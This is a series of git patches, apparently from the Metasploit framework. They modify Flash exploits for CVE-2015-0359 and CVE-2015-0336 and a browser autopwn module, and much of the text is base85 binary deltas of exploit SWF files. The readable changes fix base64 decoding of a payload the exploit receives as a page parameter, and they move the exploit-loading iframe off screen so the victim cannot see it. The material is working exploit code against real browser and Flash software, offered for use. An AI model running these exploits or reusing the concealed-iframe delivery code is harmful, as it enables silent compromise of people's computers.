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

diff --git a/external/source/exploits/CVE-2015-0359/Msf.as b/external/source/exploits/CVE-2015-0359/Msf.as
index 1bf0cd1947..3556b41542 100755
--- a/external/source/exploits/CVE-2015-0359/Msf.as
+++ b/external/source/exploits/CVE-2015-0359/Msf.as
@@ -43,7 +43,10 @@ package
 
 		private function mainThread():void
 		{
-			b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
+			var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
+			var pattern:RegExp = / /g;
+			b64_payload = b64_payload.replace(pattern, "+")
+			b64.decode(b64_payload)
 			payload = b64.toByteArray().toString()
 			ba.length = 0x1000
 			ba.shareable = true

From 5d0053e4efd6e58f79dabdde7de60ee21dd900b3 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Wed, 27 May 2015 00:43:47 -0500
Subject: [PATCH 0206/1013] Move iframe instead of hiding, which seems to
 improve Flash reliability

---
 lib/msf/core/exploit/browserautopwnv2.rb | 29 +++++++++++++++++-------
 1 file changed, 21 insertions(+), 8 deletions(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index 8cde1330d2..1ad9b4a24b 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -743,17 +743,30 @@ module Msf
       var currentIndex = 0;
       var exploitList = [#{exploit_list.map! {|e| "'#{e}'"} * ", "}];
 
+      function setElementStyle(e, opts) {
+        if (typeof e.style.setAttribute == 'undefined') {
+          var attributeString = '';
+          for (var key in opts) { attributeString += key + ":" + opts[key] + ";" }
+          e.setAttribute("style", attributeString);
+        } else {
+          for (var key in opts) {
+            e.style.setAttribute(key, opts[key]);
+          }
+        }
+      }
+
+      function moveIframe(e) {
+        var opts = {
+          'position': 'absolute',
+          'left': screen.width * -screen.width
+        }
+        setElementStyle(e, opts);
+      }
+
       window.onload = function() {
         var e = document.createElement("iframe");
         e.setAttribute("id", "myiframe");
-        //if (typeof e.style.setAttribute == 'undefined') {
-        //  e.setAttribute("style", "visibility:hidden;height:0;width:0;border:0");
-        //} else {
-        //  e.style.setAttribute("visibility", "hidden");
-        //  e.style.setAttribute("height", "0");
-        //  e.style.setAttribute("width", "0");
-        //  e.style.setAttribute("border", "0");
-        //}
+        moveIframe(e);
         document.body.appendChild(e);
         setTimeout("loadExploit(currentIndex)", 1000);
       }

From 801deeaddf9e2478fce0b0a85b8c9d2e57997e88 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Tue, 26 May 2015 17:20:49 -0500
Subject: [PATCH 0207/1013] Fix CVE-2015-0336

---
 data/exploits/CVE-2015-0336/msf.swf           | Bin 18060 -> 18121 bytes
 external/source/exploits/CVE-2015-0336/Msf.as |   7 +++++--
 2 files changed, 5 insertions(+), 2 deletions(-)

diff --git a/data/exploits/CVE-2015-0336/msf.swf b/data/exploits/CVE-2015-0336/msf.swf
index 4a080464a1976c24c6aadb2ed1fad6110bf9983e..97b6ffe99c8b2f00fb4196a19f6bd600601dfc99 100755
GIT binary patch
delta 17980
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
